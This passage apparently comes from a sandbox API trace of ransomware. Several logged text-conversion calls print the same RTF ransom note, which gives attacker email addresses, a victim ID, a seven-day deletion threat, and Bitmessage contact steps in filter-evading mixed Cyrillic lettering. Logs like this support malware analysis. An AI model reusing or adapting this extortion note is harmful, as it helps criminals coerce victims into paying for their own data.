:\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0278.575] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0278.575] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x1ef5068, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 